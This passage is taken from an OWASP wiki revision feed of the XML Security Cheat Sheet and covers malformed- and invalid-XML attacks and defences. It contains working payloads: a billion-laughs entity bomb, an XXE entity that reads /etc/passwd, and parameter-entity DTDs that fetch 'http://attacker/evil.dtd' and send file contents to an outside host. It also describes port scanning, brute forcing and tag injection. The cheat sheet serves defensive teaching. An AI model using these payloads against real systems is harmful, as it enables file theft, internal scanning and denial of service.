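    # Level 0 is the base entity; every further level repeats the previous
    # one fanout times, so the number of copies is fanout ** levels.
    return len(base_text) * fanout ** levels


print(expanded_characters())
```

With the default values the result is 3,000,000,000 characters, and each additional level multiplies that figure by ten.&lt;br /&gt;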
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;SOAP-ENV:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP-ENV=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP-ENV:Body&amp;gt;&lt;br /&gt;
    &amp;lt;KEYWORD xmlns=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP-ENV:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP-ENV:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve resources such as a local file or a file via HTTP/HTTPS/FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information obtained will depend on the type of implementation. Responses can be classified as follows, ranked from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish in higher-latency networks.&lt;br /&gt;
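&lt;br /&gt;
The averaging step described above can be sketched in Python. The function name &amp;lt;tt&amp;gt;rank_by_average_time&amp;lt;/tt&amp;gt; and the shape of its input (a mapping from port number to a list of response times in seconds) are assumptions made for illustration; the sketch only analyzes measurements that were already collected.&lt;br /&gt;

```python
from statistics import mean


def rank_by_average_time(samples):
    # samples maps each port to a list of measured response times in seconds.
    averages = {port: mean(times) for port, times in samples.items()}
    # Sorted from the fastest to the slowest average response time.
    return sorted(averages.items(), key=lambda item: item[1])
```

Whether the faster or the slower group corresponds to open ports depends on the implementation being tested, so the ranking only separates the ports into groups and does not label them.&lt;br /&gt;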
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information component of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
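&lt;br /&gt;
From the defensive side, an application that inspects the URIs referenced by a document could refuse any that carry credentials. The following Python sketch shows one possible check using the standard library. The helper name &amp;lt;tt&amp;gt;embedded_credentials&amp;lt;/tt&amp;gt; is hypothetical and is not part of the original cheat sheet.&lt;br /&gt;

```python
from urllib.parse import urlsplit


def embedded_credentials(uri):
    """Return (username, password) found in the URI, or None if absent."""
    parts = urlsplit(uri)
    if parts.username is None and parts.password is None:
        return None
    return parts.username, parts.password


found = embedded_credentials("foo://username:password@example.com:8080/")
clean = embedded_credentials("foo://example.com:8080/")
```

A caller could reject the document whenever the helper returns something other than &amp;lt;tt&amp;gt;None&amp;lt;/tt&amp;gt;.&lt;br /&gt;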
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224428</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224428"/>
				<updated>2016-12-21T20:15:13Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
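&lt;br /&gt;
The comparison described above could be approximated with a short Python script. This is a minimal sketch that uses the standard library parser as a stand-in for the parser under test. The helper names and the document size are assumptions made for illustration, and a real assessment would repeat each measurement many times.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(children):
    """Build a well-formed document with the given number of child elements."""
    root = ET.Element("items")
    for index in range(children):
        ET.SubElement(root, "item").text = str(index)
    return ET.tostring(root)


def timed_parse(data):
    """Return (seconds_spent, parsed_ok) for one parsing attempt."""
    start = time.perf_counter()
    try:
        ET.fromstring(data)
        parsed_ok = True
    except ET.ParseError:
        parsed_ok = False
    return time.perf_counter() - start, parsed_ok


well_formed = build_document(10000)
malformed = well_formed[:-3]  # cut into the final closing tag

good_time, good_ok = timed_parse(well_formed)
bad_time, bad_ok = timed_parse(malformed)
print(f"well-formed: {good_time:.4f}s, malformed: {bad_time:.4f}s")
```

If the malformed version consistently takes much longer than the well-formed one, the parser may be a candidate for the asymmetric resource consumption attack described in this section.&lt;br /&gt;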
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
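&lt;br /&gt;
One way to limit exposure to deeply nested input is to count open elements while the document is streamed and to abort once a limit is exceeded. The Python sketch below illustrates the idea with the standard library. The exception class, the function names, and the limit of 100 levels are hypothetical choices for this example, not values taken from the original report.&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET


class DepthLimitExceeded(Exception):
    """Raised when a document nests deeper than the configured limit."""


def parse_with_depth_limit(stream, max_depth):
    """Stream-parse a document, aborting once nesting exceeds max_depth."""
    depth = 0
    deepest = 0
    for event, element in ET.iterparse(stream, events=("start", "end")):
        if event == "start":
            depth += 1
            deepest = max(deepest, depth)
            if depth > max_depth:
                raise DepthLimitExceeded(f"nesting deeper than {max_depth}")
        else:
            depth -= 1
            element.clear()  # release content that is no longer needed
    return deepest


def nested_document(levels):
    """Build a well-formed document nested to the given depth."""
    root = ET.Element("A1")
    current = root
    for level in range(2, levels + 1):
        current = ET.SubElement(current, f"A{level}")
    return ET.tostring(root)


shallow_depth = parse_with_depth_limit(io.BytesIO(nested_document(5)), max_depth=100)
try:
    parse_with_depth_limit(io.BytesIO(nested_document(200)), max_depth=100)
    rejected = False
except DepthLimitExceeded:
    rejected = True
```

Because the check runs on each start event, processing stops as soon as the limit is crossed instead of after the whole document has been read.&lt;br /&gt;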
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
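&lt;br /&gt;
When no schema is available, an application can at least refuse messages in which an element that should appear once is repeated. The following Python sketch rebuilds the manipulated message and reports the repeated names. The helper name &amp;lt;tt&amp;gt;duplicated_children&amp;lt;/tt&amp;gt; is hypothetical, and a structural check of this kind complements schema validation and does not replace it.&lt;br /&gt;

```python
from collections import Counter
import xml.etree.ElementTree as ET


def duplicated_children(parent):
    """Return the sorted names of child elements that appear more than once."""
    counts = Counter(child.tag for child in parent)
    return sorted(tag for tag, count in counts.items() if count > 1)


# Rebuild the manipulated message from the example above.
buy = ET.Element("buy")
ET.SubElement(buy, "id").text = "123"
ET.SubElement(buy, "price").text = "0"
ET.SubElement(buy, "id")
ET.SubElement(buy, "price").text = "10"

duplicates = duplicated_children(buy)
```

An application could reject the transaction whenever the returned list is not empty.&lt;br /&gt;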
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
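&lt;br /&gt;
When the schema language cannot express these limits, the application has to enforce them itself. The Python sketch below shows one way to do so. The function name &amp;lt;tt&amp;gt;validate_age&amp;lt;/tt&amp;gt;, the three-character limit, and the maximum age of 150 are assumptions chosen for illustration.&lt;br /&gt;

```python
def validate_age(text, max_digits=3, max_age=150):
    """Return the age as an int, or raise ValueError if it is out of bounds."""
    # Check the length first so that oversized input is never converted.
    if len(text) == 0 or len(text) > max_digits:
        raise ValueError("age must contain between 1 and max_digits characters")
    if not (text.isascii() and text.isdigit()):
        raise ValueError("age must contain only the digits 0 to 9")
    age = int(text)
    if age > max_age:
        raise ValueError("age is outside the accepted range")
    return age


accepted = validate_age("42")
try:
    validate_age("1" * 1000000)
    oversized_rejected = False
except ValueError:
    oversized_rejected = True
```

The length check comes before the numeric conversion, so a one-million-digit value is discarded without being parsed as a number.&lt;br /&gt;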
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
